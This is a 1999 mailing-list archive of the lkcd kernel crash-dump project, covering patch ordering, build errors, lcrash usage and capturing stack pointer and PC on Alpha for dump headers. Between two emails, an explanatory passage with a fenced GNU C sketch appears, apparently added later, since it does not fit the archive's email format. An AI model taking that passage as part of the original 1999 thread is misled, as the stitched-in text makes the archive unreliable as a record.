From owner-lkcd@oss.sgi.com Tue Dec 14 23:20:22 1999 Received: by oss.sgi.com id ; Tue, 14 Dec 1999 23:20:12 -0800 Received: from pneumatic-tube.sgi.com ([204.94.214.22]:18744 "EHLO pneumatic-tube.sgi.com") by oss.sgi.com with ESMTP id ; Tue, 14 Dec 1999 23:20:04 -0800 Received: from awesome.engr.sgi.com (awesome.engr.sgi.com [150.166.49.119]) by pneumatic-tube.sgi.com (980327.SGI.8.8.8-aspam/980310.SGI-aspam) via ESMTP id XAA08482 for ; Tue, 14 Dec 1999 23:20:49 -0800 (PST) mail_from (yakker@cthulhu.engr.sgi.com) Received: from localhost (yakker@localhost) by awesome.engr.sgi.com (980427.SGI.8.8.8/970903.SGI.AUTOCF) via SMTP id XAA41750; Tue, 14 Dec 1999 23:17:46 -0800 (PST) Date: Tue, 14 Dec 1999 23:17:45 -0800 (PST) From: Matt Robinson To: Keith Owens cc: ashisharora@mailcity.com, lkcd@oss.sgi.com Subject: Re: Problem in Applying the patch In-Reply-To: <25634.945242082@ocs3.ocs-net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing Ashish, have you read the FAQ? http://oss.sgi.com/projects/lkcd/faq.html#2.3 This should have answered your question. --Matt On Wed, 15 Dec 1999, Keith Owens wrote: |>On Tue, 14 Dec 1999 22:27:17 -0800, |>"Ashish Arora" wrote: |>> I applied the patch for the lkcd 1.0.3. to the linux kernel version 2.2.12 but i faced the problem that it was not able to find the declarations of AS_KERNEL, AS_USER, AS_REMOTE etc. I am attaching the file for reference. |> |>You have to apply the raw I/O patch (sgi+straw2.2.13.patch) *before* |>the lkcd patch. 
|> From owner-lkcd@oss.sgi.com Thu Dec 16 00:39:25 1999 Received: by oss.sgi.com id ; Thu, 16 Dec 1999 00:39:15 -0800 Received: from fes-qout.whowhere.com ([209.1.236.7]:13812 "HELO mailcity.com") by oss.sgi.com with SMTP id ; Thu, 16 Dec 1999 00:38:58 -0800 Received: from Unknown/Local ([?.?.?.?]) by mailcity.com; Thu Dec 16 00:37:37 1999 To: lkcd@oss.sgi.com Date: Thu, 16 Dec 1999 00:37:37 -0800 From: "Ashish Arora" Message-ID: Mime-Version: 1.0 X-Sent-Mail: off Reply-To: ashisharora@mailcity.com X-Mailer: MailCity Service Subject: Problem with Mission Critical Linux Patch X-Sender-Ip: 192.35.232.115 Organization: MailCity (http://www.mailcity.lycos.com:80) Content-Type: text/plain; charset=us-ascii Content-Language: en Content-Length: 2076 Content-Transfer-Encoding: 7bit Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing Hi All , I applied the patch 2.2.13.larry and 2.2.13-zcore 1.0 from the Mission Critical Linux, to 2.2.13 kernel but when i recompiled the kernel, i got an error while compiling. I have attached the error faced below for reference. Can you guide me about this problem and give me a solution for this. -- Ashish i applied the patches. 
Then issued the following commands

make menuconfig
make dep;make clean; make bzImage

--------------------------------------------------------------------------------
this is the snapshot on the screen when the error occurred
--------------------------------------------------------------------------------

gcc -E -C -P -I/usr/src/linux-2.2.13mc/include -imacros /usr/src/linux-2.2.13mc/include/asm-i386/page_offset.h -Ui386 arch/i386/vmlinux.lds.S >arch/i386/vmlinux.lds
ld -m elf_i386 -T /usr/src/linux-2.2.13mc/arch/i386/vmlinux.lds -e stext arch/i386/kernel/head.o arch/i386/kernel/init_task.o init/main.o init/version.o \
        --start-group \
        arch/i386/kernel/kernel.o arch/i386/mm/mm.o kernel/kernel.o mm/mm.o fs/fs.o ipc/ipc.o \
        fs/filesystems.a \
        net/network.a \
        drivers/block/block.a drivers/char/char.a drivers/misc/misc.a drivers/net/net.a drivers/scsi/scsi.a drivers/cdrom/cdrom.a drivers/pci/pci.a drivers/net/fc/fc.a drivers/pnp/pnp.a drivers/video/video.a \
        /usr/src/linux-2.2.13mc/arch/i386/lib/lib.a /usr/src/linux-2.2.13mc/lib/lib.a /usr/src/linux-2.2.13mc/arch/i386/lib/lib.a \
        --end-group \
        -o vmlinux
kernel/kernel.o: In function `save_core':
kernel/kernel.o(.text+0xb2b9): undefined reference to `deflateInit_'
kernel/kernel.o(.text+0xb2de): undefined reference to `deflateReset'
kernel/kernel.o(.text+0xb2f7): undefined reference to `deflate'
kernel/kernel.o(.text+0xb4b9): undefined reference to `deflateEnd'
kernel/kernel.o(.text+0xb566): undefined reference to `deflateEnd'
make: *** [vmlinux] Error 1

LYCOShop is now open. On your mark, get set, SHOP!!!
http://shop.lycos.com/

From owner-lkcd@oss.sgi.com Thu Dec 16 13:54:28 1999
Received: by oss.sgi.com id ; Thu, 16 Dec 1999 13:54:18 -0800
Received: from zmamail01.zma.compaq.com ([161.114.64.101]:52494 "HELO zmamail01.zma.compaq.com") by oss.sgi.com with SMTP id ; Thu, 16 Dec 1999 13:54:01 -0800
Received: by zmamail01.zma.compaq.com (Postfix, from userid 12345) id D5C95181; Thu, 16 Dec 1999 16:53:03 -0500 (EST)
Received: from cxo3ns.cxo.dec.com (cxo3ns.cxo.dec.com [16.63.0.10]) by zmamail01.zma.compaq.com (Postfix) with SMTP id E23A1326; Thu, 16 Dec 1999 16:53:02 -0500 (EST)
Received: from brownfur.cxo.dec.com by cxo3ns.cxo.dec.com; (5.65v4.0/1.1.8.2/11Apr96-1001AM) id AA20313; Thu, 16 Dec 1999 14:53:01 -0700
Received: from dhcp192-89.cxo.dec.com by brownfur.cxo.dec.com (5.65v4.0/1.1.10.5/17Feb98-0753AM) id AA01697; Thu, 16 Dec 1999 14:53:01 -0700
Received: by compaq.com (sSMTP sendmail emulation); Sat, 18 Dec 1999 14:51:51 -0700
Content-Length: 916
Message-Id:
X-Mailer: XFMail 1.4.4 on Linux
X-Priority: 3 (Normal)
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 8bit
Mime-Version: 1.0
In-Reply-To:
Date: Sat, 18 Dec 1999 14:51:51 -0700 (MST)
Reply-To: Brian Hall
From: Brian Hall
To: Matt Robinson , x-linux-kernel@vger.rutgers.edu, comp.os.linux.alpha@list.deja.com
Subject: Retrieving PC from (traversing) the stack on Alpha
Cc: lkcd@oss.sgi.com
Sender: owner-lkcd@oss.sgi.com
Precedence: bulk
Return-Path:
X-Orcpt: rfc822;lkcd-outgoing

Okay, after some research, I think I figured out how to get at the needed Alpha
registers:

register unsigned long fptr __asm__("$15"); /* get frame pointer? */
register unsigned long sptr __asm__("$30"); /* get stack pointer? */

Now, my understanding of the problem is that I need to go back two frames on
the stack to get the PC of interest, and three for the RA of interest. How do I
do this? I haven't had much luck yet trying to figure out how to navigate the
kernel stack.
I see the pt_regs structure, but I'm not exactly sure how to figure the frame size, since that can vary with each frame. On 13-Dec-1999 Matt Robinson wrote: > The problem is from panic(), you don't have the registers, so you > need to grab them. That way the 'lcrash' code has a point to start > with as far as the failing process is concerned. Hence the "if (regs)" > stuff. -- Brian Hall Linux Consultant From owner-lkcd@oss.sgi.com Thu Dec 16 20:05:19 1999 Received: by oss.sgi.com id ; Thu, 16 Dec 1999 20:05:10 -0800 Received: from fes-qout.whowhere.com ([209.1.236.7]:15332 "HELO mailcity.com") by oss.sgi.com with SMTP id ; Thu, 16 Dec 1999 20:04:58 -0800 Received: from Unknown/Local ([?.?.?.?]) by mailcity.com; Thu Dec 16 20:02:27 1999 To: lkcd@oss.sgi.com Date: Thu, 16 Dec 1999 20:02:27 -0800 From: "Guru raj" Message-ID: Mime-Version: 1.0 X-Sent-Mail: on Reply-To: gurur@mailcity.com X-Expiredinmiddle: true X-Mailer: MailCity Service Subject: SGI Linux 1.1 Kernel Patch X-Sender-Ip: 203.141.89.173 Organization: MailCity (http://www.mailcity.lycos.com:80) Content-Type: text/plain; charset=us-ascii Content-Language: en Content-Length: 608 Content-Transfer-Encoding: 7bit Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing I have RH6.1. I downloaded linux-2.2.10 from www.kernel.org. and the SGI kernel patch from oss.sgi.com/projects/sgilinux1.1. After applying the patch I compiled the kernel and created a new kernel image. When I tried to boot into this new kernel,after loading and uncompressing the kernel, it gives the following message 'unable to handle kernel paging request at ox______' It dumps the values of registers and enters in to kernel debugging mode and stops at debugging prompt. What might be the problem. LYCOShop is now open. On your mark, get set, SHOP!!! 
http://shop.lycos.com/ From owner-lkcd@oss.sgi.com Thu Dec 16 22:09:10 1999 Received: by oss.sgi.com id ; Thu, 16 Dec 1999 22:09:01 -0800 Received: from pneumatic-tube.sgi.com ([204.94.214.22]:47485 "EHLO pneumatic-tube.sgi.com") by oss.sgi.com with ESMTP id ; Thu, 16 Dec 1999 22:08:49 -0800 Received: from awesome.engr.sgi.com (awesome.engr.sgi.com [150.166.49.119]) by pneumatic-tube.sgi.com (980327.SGI.8.8.8-aspam/980310.SGI-aspam) via ESMTP id WAA04895 for ; Thu, 16 Dec 1999 22:09:45 -0800 (PST) mail_from (yakker@cthulhu.engr.sgi.com) Received: from localhost (yakker@localhost) by awesome.engr.sgi.com (980427.SGI.8.8.8/970903.SGI.AUTOCF) via SMTP id WAA45400; Thu, 16 Dec 1999 22:06:40 -0800 (PST) Date: Thu, 16 Dec 1999 22:06:39 -0800 (PST) From: Matt Robinson To: Guru raj cc: lkcd@oss.sgi.com Subject: Re: SGI Linux 1.1 Kernel Patch In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing On Thu, 16 Dec 1999, Guru raj wrote: |>I have RH6.1. |> |>I downloaded linux-2.2.10 from www.kernel.org. |>and the SGI kernel patch from oss.sgi.com/projects/sgilinux1.1. |> |>After applying the patch I compiled the kernel and created a new kernel image. |> |>When I tried to boot into this new kernel,after loading and uncompressing the kernel, it gives the following message |> |>'unable to handle kernel paging request at ox______' |> |>It dumps the values of registers and enters in to kernel debugging mode and stops at debugging |>prompt. If you're in KDB, what does 'bt' say? Do you have a screen dump of the Oops information? If you crashed on the way up, it may be long before the crash dumping is configured properly in the kernel. |>What might be the problem. |> |>LYCOShop is now open. On your mark, get set, SHOP!!! |>http://shop.lycos.com/ I'm forwarding this to one of SGI's internal lists to see if we've heard of anything like this.
If you could let us know what hardware configuration you're running with, including all PCI/ISA cards, number of CPUs, memory configuration/layout/vendor, processor type and speed, etc., perhaps we can make further progress. Also, did your 2.2.10 kernel build and run properly without SGILE 1.1? Thanks, let us know what we can do. --Matt From owner-lkcd@oss.sgi.com Mon Dec 20 02:05:08 1999 Received: by oss.sgi.com id ; Mon, 20 Dec 1999 02:04:49 -0800 Received: from fes-qout.whowhere.com ([209.1.236.7]:18862 "HELO mailcity.com") by oss.sgi.com with SMTP id ; Mon, 20 Dec 1999 02:04:30 -0800 Received: from Unknown/Local ([?.?.?.?]) by mailcity.com; Mon Dec 20 02:02:42 1999 To: "Matt Robinson" Date: Mon, 20 Dec 1999 02:02:42 -0800 From: "Ashish Arora" Message-ID: Mime-Version: 1.0 Cc: lkcd@oss.sgi.com X-Sent-Mail: off Reply-To: ashisharora@mailcity.com X-Mailer: MailCity Service Subject: Patch applied successfully But... X-Sender-Ip: 192.35.232.13 Organization: MailCity (http://www.mailcity.lycos.com:80) Content-Type: text/plain; charset=us-ascii Content-Language: en Content-Length: 642 Content-Transfer-Encoding: 7bit Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing Dear Matt, i applied the patch successfully and am facing no problems working with it. It is working fine when a system panic occurs(when i call the panic function), i am able to get the trace and the report. Can u tell me what happens when the system crashes. First of all i would like to know how can i make my system to crash and then what happens when system crashes, does it call the panic function when it crashes. And also what happens when the system hangs, is there any facility related for that to see the report why the system hung. --Ashish LYCOShop is now open. On your mark, get set, SHOP!!! 
http://shop.lycos.com/ From owner-lkcd@oss.sgi.com Mon Dec 20 23:52:35 1999 Received: by oss.sgi.com id ; Mon, 20 Dec 1999 23:52:26 -0800 Received: from fes-qout.whowhere.com ([209.1.236.7]:35266 "HELO mailcity.com") by oss.sgi.com with SMTP id ; Mon, 20 Dec 1999 23:52:13 -0800 Received: from Unknown/Local ([?.?.?.?]) by mailcity.com; Mon Dec 20 23:50:27 1999 To: "Matt Robinson" Date: Mon, 20 Dec 1999 23:50:27 -0800 From: "Ashish Arora" Message-ID: Mime-Version: 1.0 Cc: lkcd@oss.sgi.com X-Sent-Mail: off Reply-To: ashisharora@mailcity.com X-Mailer: MailCity Service Subject: Problem in using lcrash commands X-Sender-Ip: 192.35.232.13 Organization: MailCity (http://www.mailcity.lycos.com:80) Content-Type: text/plain; charset=us-ascii Content-Language: en Content-Length: 1333 Content-Transfer-Encoding: 7bit Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing Dear Matt, i am using the commands with the lcrash. In this i am unable to find the proper usage for the commands. Whenever i type a command in lcrash, it gives a message saying that the usage for the command is wrong. Can u tell me where can i get to know about the proper usage for all those commands. I have already gone through the help provided for each command but i am still unable to overcome that problem. Also when i used the whatis command with -s option it gave a segmentation fault error and quitted from lcrash. --Ashish -- On Tue, 14 Dec 1999 23:17:45 Matt Robinson wrote: >Ashish, have you read the FAQ? > > http://oss.sgi.com/projects/lkcd/faq.html#2.3 > >This should have answered your question. > >--Matt > >On Wed, 15 Dec 1999, Keith Owens wrote: >|>On Tue, 14 Dec 1999 22:27:17 -0800, >|>"Ashish Arora" wrote: >|>> I applied the patch for the lkcd 1.0.3. to the linux kernel version 2.2.12 but i faced the problem that it was not able to find the declarations of AS_KERNEL, AS_USER, AS_REMOTE etc. I am attaching the file for reference. 
>|> >|>You have to apply the raw I/O patch (sgi+straw2.2.13.patch) *before* >|>the lkcd patch. >|> > > LYCOShop is now open. On your mark, get set, SHOP!!! http://shop.lycos.com/ From owner-lkcd@oss.sgi.com Tue Dec 21 09:03:01 1999 Received: by oss.sgi.com id ; Tue, 21 Dec 1999 09:02:51 -0800 Received: from sgi.SGI.COM ([192.48.153.1]:13368 "EHLO sgi.com") by oss.sgi.com with ESMTP id ; Tue, 21 Dec 1999 09:02:32 -0800 Received: from loco.csd.sgi.com ([150.166.1.62]) by sgi.com (980327.SGI.8.8.8-aspam/980304.SGI-aspam: SGI does not authorize the use of its proprietary systems or networks for unsolicited or bulk email from the Internet.) via ESMTP id JAA07248 for ; Tue, 21 Dec 1999 09:01:50 -0800 (PST) mail_from (tjm@sgi.com) Received: from sgi.com (localhost.csd.sgi.com [127.0.0.1]) by loco.csd.sgi.com (980427.SGI.8.8.8/970903.SGI.AUTOCF) via ESMTP id JAA15836; Tue, 21 Dec 1999 09:00:17 -0800 (PST) Message-ID: <385FB21F.1C78E7C9@sgi.com> Date: Tue, 21 Dec 1999 09:00:15 -0800 From: Tom Morano X-Mailer: Mozilla 4.61C-SGI [en] (X11; I; IRIX 6.5 IP22) X-Accept-Language: en MIME-Version: 1.0 To: ashisharora@mailcity.com CC: Matt Robinson , lkcd@oss.sgi.com Subject: Re: Problem in using lcrash commands References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing Ashish Arora wrote: > > Dear Matt, > i am using the commands with the lcrash. In this i am unable to find the proper usage for the commands. Whenever i type a command in lcrash, it gives a message saying that the usage for the command is wrong. Can u tell me where can i get to know about the proper usage for all those commands. I have already gone through the help provided for each command but i am still unable to overcome that problem. It's hard to tell what's going on without an example of what you are trying. Could you please provide such an example? 
> Also when i used the whatis command with -s option it gave a segmentation fault error and quitted from lcrash. Hi Ashish, I'm not sure what's going on here. The -s flag is not valid for the 'whatis' command. When I tried it, here's what I got... >> whatis -s Illegal comamnd line option: 's' USAGE: whatis [-a] [-f] [-l] [-n] [-w outfile] expression BTW, the whatis command doesn't do anything unless you first load in type information from a namelist file (one is created in the cmd/lcrash/lib/libklib directory). You have to issue a command such as this: >> addtypes namelist Then you can do something like this... >> whatis socket struct socket { socket_state state; long unsigned int flags; struct proto_ops *ops; struct inode *inode; struct fasync_struct *fasync_list; struct file *file; struct sock *sk; struct wait_queue *wait; short int type; unsigned char passcred; unsigned char tli; }; Hope this helps, Tom > --Ashish > > -- > > On Tue, 14 Dec 1999 23:17:45 Matt Robinson wrote: > >Ashish, have you read the FAQ? > > > > http://oss.sgi.com/projects/lkcd/faq.html#2.3 > > > >This should have answered your question. > > > >--Matt > > > >On Wed, 15 Dec 1999, Keith Owens wrote: > >|>On Tue, 14 Dec 1999 22:27:17 -0800, > >|>"Ashish Arora" wrote: > >|>> I applied the patch for the lkcd 1.0.3. to the linux kernel version 2.2.12 but i faced the problem that it was not able to find the declarations of AS_KERNEL, AS_USER, AS_REMOTE etc. I am attaching the file for reference. > >|> > >|>You have to apply the raw I/O patch (sgi+straw2.2.13.patch) *before* > >|>the lkcd patch. > >|> > > > > > > LYCOShop is now open. On your mark, get set, SHOP!!! 
> http://shop.lycos.com/ From owner-lkcd@oss.sgi.com Tue Dec 21 10:31:01 1999 Received: by oss.sgi.com id ; Tue, 21 Dec 1999 10:30:52 -0800 Received: from pneumatic-tube.sgi.com ([204.94.214.22]:41022 "EHLO pneumatic-tube.sgi.com") by oss.sgi.com with ESMTP id ; Tue, 21 Dec 1999 10:30:30 -0800 Received: from awesome.engr.sgi.com (awesome.engr.sgi.com [150.166.49.119]) by pneumatic-tube.sgi.com (980327.SGI.8.8.8-aspam/980310.SGI-aspam) via ESMTP id KAA08983 for ; Tue, 21 Dec 1999 10:31:54 -0800 (PST) mail_from (yakker@cthulhu.engr.sgi.com) Received: from localhost (yakker@localhost) by awesome.engr.sgi.com (980427.SGI.8.8.8/970903.SGI.AUTOCF) via SMTP id KAA62063; Tue, 21 Dec 1999 10:28:44 -0800 (PST) Date: Tue, 21 Dec 1999 10:28:44 -0800 (PST) From: Matt Robinson Reply-To: Matt Robinson To: Ashish Arora cc: Matt Robinson , lkcd@oss.sgi.com Subject: Re: Patch applied successfully But... In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing Ashish, have you read the FAQ? Read the section "Kernel Crash Dump Process". Most everything you asked is answered there. As for system hangs, we haven't created an NMI (non-maskable interrupt) hook into the hardware to allow people to NMI their systems and get a memory dump (yet). When that's done, we'll let you know. If you have a specific question about how things work, please ask, but if you're looking for an overview, read the FAQ. We put a lot of time in it so we wouldn't have to answer generic questions over and over. Thanks. --Matt On Mon, 20 Dec 1999, Ashish Arora wrote: |>Dear Matt, |> i applied the patch successfully and am facing no problems working with it. It is working fine when a system panic occurs(when i call the panic function), i am able to get the trace and the report. Can u tell me what happens when the system crashes.
First of all i would like to know how can i make my system to crash and then what happens when system crashes, does it call the panic function when it crashes. And also what happens when the system hangs, is there any facility related for that to see the report why the system hung. |> --Ashish |> |> |>LYCOShop is now open. On your mark, get set, SHOP!!! |>http://shop.lycos.com/ |> From owner-lkcd@oss.sgi.com Tue Dec 21 11:58:10 1999 Received: by oss.sgi.com id ; Tue, 21 Dec 1999 11:58:01 -0800 Received: from zmamail02.zma.compaq.com ([161.114.64.102]:25098 "HELO zmamail02.zma.compaq.com") by oss.sgi.com with SMTP id ; Tue, 21 Dec 1999 11:57:37 -0800 Received: by zmamail02.zma.compaq.com (Postfix, from userid 12345) id 5A904313; Tue, 21 Dec 1999 14:57:03 -0500 (EST) Received: from cxo3ns.cxo.dec.com (cxo3ns.cxo.dec.com [16.63.0.10]) by zmamail02.zma.compaq.com (Postfix) with SMTP id 46A0D12E; Tue, 21 Dec 1999 14:57:02 -0500 (EST) Received: from brownfur.cxo.dec.com by cxo3ns.cxo.dec.com; (5.65v4.0/1.1.8.2/11Apr96-1001AM) id AA05553; Tue, 21 Dec 1999 12:57:01 -0700 Received: from dhcp192-89.cxo.dec.com by brownfur.cxo.dec.com (5.65v4.0/1.1.10.5/17Feb98-0753AM) id AA24464; Tue, 21 Dec 1999 12:57:00 -0700 Received: by compaq.com (sSMTP sendmail emulation); Thu, 23 Dec 1999 12:55:18 -0700 Content-Length: 1324 Message-Id: X-Mailer: XFMail 1.4.4 on Linux X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit Mime-Version: 1.0 In-Reply-To: Date: Thu, 23 Dec 1999 12:55:17 -0700 (MST) Reply-To: Brian Hall From: Brian Hall To: axp-list@redhat.com Subject: RE: Retrieving PC from (traversing) the stack on Alpha Cc: lkcd@oss.sgi.com, comp.os.linux.alpha@list.deja.com, Matt Robinson Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing Well, it's not clear to me how to get the PC and RA of interest off the stack when we are in the vmdump functions.
We could retrieve the RA from register 26 in the panic() function itself, and pass that to the dump_execute function. Then the dump code could at least tell where panic was called from. Is this sufficient, or at least a start? On 18-Dec-1999 Brian Hall wrote: > Okay, after some research, I think I figured out how to get at the needed > Alpha registers: > > register unsigned long fptr __asm__("$15"); /* get frame pointer? */ > register unsigned long sptr __asm__("$30"); /* get stack pointer? */ > > Now, my understanding of the problem is that I need to go back two frames on > the stack to get the PC of interest, and three for the RA of interest. How do > I > do this? I haven't had much luck yet trying to figure out how to navigate the > kernel stack. I see the pt_regs structure, but I'm not exactly sure how to > figure the frame size, since that can vary with each frame. > > On 13-Dec-1999 Matt Robinson wrote: >> The problem is from panic(), you don't have the registers, so you >> need to grab them. That way the 'lcrash' code has a point to start >> with as far as the failing process is concerned. Hence the "if (regs)" >> stuff.
-- Brian Hall Linux Consultant From owner-lkcd@oss.sgi.com Tue Dec 21 12:10:12 1999 Received: by oss.sgi.com id ; Tue, 21 Dec 1999 12:10:02 -0800 Received: from pneumatic-tube.sgi.com ([204.94.214.22]:50002 "EHLO pneumatic-tube.sgi.com") by oss.sgi.com with ESMTP id ; Tue, 21 Dec 1999 12:09:41 -0800 Received: from awesome.engr.sgi.com (awesome.engr.sgi.com [150.166.49.119]) by pneumatic-tube.sgi.com (980327.SGI.8.8.8-aspam/980310.SGI-aspam) via ESMTP id MAA00985 for ; Tue, 21 Dec 1999 12:11:05 -0800 (PST) mail_from (yakker@cthulhu.engr.sgi.com) Received: from localhost (yakker@localhost) by awesome.engr.sgi.com (980427.SGI.8.8.8/970903.SGI.AUTOCF) via SMTP id MAA52341; Tue, 21 Dec 1999 12:07:53 -0800 (PST) Date: Tue, 21 Dec 1999 12:07:52 -0800 (PST) From: Matt Robinson To: Brian Hall cc: axp-list@redhat.com, lkcd@oss.sgi.com, comp.os.linux.alpha@list.deja.com, Matt Robinson Subject: RE: Retrieving PC from (traversing) the stack on Alpha In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing On Thu, 23 Dec 1999, Brian Hall wrote: |>Well, it's not clear to me how to get the PC and RA of interest off the stack |>when we are in the vmdump functions. We could retreive the RA from register 26 |>in the panic() function itself, and pass that to the dump_execute function. |>Then the dump code could at least tell where panic was called from. Is this |>sufficient, or at least a start? In the __dump_execute() function, just save the PC into the right registers, and that'll be enough. You don't have to fill the pt_regs structure. The big keys are the stack pointer and the PC for that process within the __dump_execute() function. Save the stack pointer into dump_header.dh_esp, and the PC into dump_header.dh_eip. That's all 'lcrash' should need in order to figure out the stack trace of the failing process (for now). 
Having the RA is nice, but not entirely necessary. I should have named dh_esp and dh_eip into something like dh_sp and dh_pc, for simplicity's sake. Next revision ... --Matt |>On 18-Dec-1999 Brian Hall wrote: |>> Okay, after some research, I think I figured out how to get at the needed |>> Alpha registers: |>> |>> register unsigned long fptr __asm__("$15"); /* get frame pointer? */ |>> register unsigned long sptr __asm__("$30"); /* get stack pointer? */ |>> |>> Now, my understanding of the problem is that I need to go back two frames on |>> the stack to get the PC of interest, and three for the RA of interest. How do |>> I |>> do this? I haven't had much luck yet trying to figure out how to navigate the |>> kernel stack. I see the pt_regs structure, but I'm not exactly sure how to |>> figure the frame size, since that can vary with each frame. |>> |>> On 13-Dec-1999 Matt Robinson wrote: |>>> The problem is from panic(), you don't have the registers, so you |>>> need to grab them. That way the 'lcrash' code has a point to start |>>> with as far as the failing process is concerned. Hence the "if (regs)" |>>> stuff. 
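For readers following the thread, the capture described above (a stack pointer plus a PC taken inside the dumping function, with the RA as an optional extra) can be sketched in GNU C. This is only a minimal illustration under stated assumptions, not the lkcd code: struct ctx_snapshot, capture_context() and show_context() are hypothetical names, and the sketch relies on the GCC/Clang extensions __builtin_frame_address(), __builtin_return_address() and the && label-address operator instead of reading Alpha registers $30 and $26 directly. The frame address is used as a stand-in for the stack pointer.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical stand-in for the dh_esp/dh_eip fields; pointer-sized on purpose. */
struct ctx_snapshot {
    uintptr_t sp;   /* frame address of the capturing function (approximates SP) */
    uintptr_t pc;   /* address of a label inside the capturing function */
    uintptr_t ra;   /* return address, i.e. where the caller resumes */
};

/* noinline keeps a real call frame so the builtins describe this function. */
__attribute__((noinline))
void capture_context(struct ctx_snapshot *snap)
{
capture_here:
    snap->sp = (uintptr_t)__builtin_frame_address(0);
    snap->pc = (uintptr_t)&&capture_here;          /* GNU C "labels as values" */
    snap->ra = (uintptr_t)__builtin_return_address(0);
}

/* Example use: take a snapshot, sanity-check it, and print it. */
void show_context(void)
{
    struct ctx_snapshot snap;

    capture_context(&snap);
    assert(snap.pc != 0 && snap.ra != 0);
    printf("sp=%#lx pc=%#lx ra=%#lx\n",
           (unsigned long)snap.sp, (unsigned long)snap.pc,
           (unsigned long)snap.ra);
}
```

A post-mortem tool would start its stack walk from the saved sp/pc pair; the ra value only adds the caller's location, which matches the "nice, but not entirely necessary" remark above.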
|> |>-- |>Brian Hall |>Linux Consultant From owner-lkcd@oss.sgi.com Tue Dec 21 15:48:56 1999 Received: by oss.sgi.com id ; Tue, 21 Dec 1999 15:48:46 -0800 Received: from zmamail02.zma.compaq.com ([161.114.64.102]:37128 "HELO zmamail02.zma.compaq.com") by oss.sgi.com with SMTP id ; Tue, 21 Dec 1999 15:48:31 -0800 Received: by zmamail02.zma.compaq.com (Postfix, from userid 12345) id 89BF220C; Tue, 21 Dec 1999 18:47:58 -0500 (EST) Received: from cxo3ns.cxo.dec.com (cxo3ns.cxo.dec.com [16.63.0.10]) by zmamail02.zma.compaq.com (Postfix) with SMTP id 7DCD72BF; Tue, 21 Dec 1999 18:47:57 -0500 (EST) Received: from brownfur.cxo.dec.com by cxo3ns.cxo.dec.com; (5.65v4.0/1.1.8.2/11Apr96-1001AM) id AA07051; Tue, 21 Dec 1999 16:47:56 -0700 Received: from dhcp192-89.cxo.dec.com by brownfur.cxo.dec.com (5.65v4.0/1.1.10.5/17Feb98-0753AM) id AA04529; Tue, 21 Dec 1999 16:47:55 -0700 Received: by compaq.com (sSMTP sendmail emulation); Thu, 23 Dec 1999 16:46:17 -0700 Content-Length: 3348 Message-Id: X-Mailer: XFMail 1.4.4 on Linux X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit Mime-Version: 1.0 In-Reply-To: Date: Thu, 23 Dec 1999 16:46:16 -0700 (MST) Reply-To: Brian Hall From: Brian Hall To: Matt Robinson Subject: new problem: can't see vmdump.h? Cc: comp.os.linux.alpha@list.deja.com, lkcd@oss.sgi.com, axp-list@redhat.com Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing OK, I've got the following code in __dump_execute: __dump_execute(struct file *dump_file, char *panic_str, struct pt_regs *regs, int dump_level, int dump_compress_pages) { dump_here: ( some code skipped here) /* For Alpha, save the Program Counter and Stack Pointer */ dump_header.dh_esp = __asm__("$30"); /* get stack pointer */ dump_header.dh_eip = &&dump_here; /* get Program Counter */ Sound OK? I removed the cmd directory temporarily from the top level Makefile so I could do a test build (lots of work todo there!). 
Had to fix a type in sd.c, but the compile died completely when it reached arch/alpha/kernel/vmdump.c, apparently because it couldn't see vmdump.h. Huh? File does exist as requested in include/linux; adding an include line with the explicit path to it didn't help. Any idea why this fails to see the include? /usr/src/linux is actually symlinked to a mounted NFS share that holds the kernel source; doesn't seem like that would be the problem since the rest of the kernel was building fine. /usr/include/linux points to ../src/linux/include/linux/. On 21-Dec-1999 Matt Robinson wrote: > On Thu, 23 Dec 1999, Brian Hall wrote: >|>Well, it's not clear to me how to get the PC and RA of interest off the >|>stack >|>when we are in the vmdump functions. We could retreive the RA from register >|>26 >|>in the panic() function itself, and pass that to the dump_execute function. >|>Then the dump code could at least tell where panic was called from. Is this >|>sufficient, or at least a start? > > In the __dump_execute() function, just save the PC into the right > registers, and that'll be enough. You don't have to fill the pt_regs > structure. > > The big keys are the stack pointer and the PC for that process within > the __dump_execute() function. Save the stack pointer into > dump_header.dh_esp, and the PC into dump_header.dh_eip. That's all > 'lcrash' should need in order to figure out the stack trace of the > failing process (for now). Having the RA is nice, but not entirely > necessary. > > I should have named dh_esp and dh_eip into something like dh_sp and > dh_pc, for simplicity's sake. Next revision ... > > --Matt > >|>On 18-Dec-1999 Brian Hall wrote: >|>> Okay, after some research, I think I figured out how to get at the needed >|>> Alpha registers: >|>> >|>> register unsigned long fptr __asm__("$15"); /* get frame pointer? */ >|>> register unsigned long sptr __asm__("$30"); /* get stack pointer? 
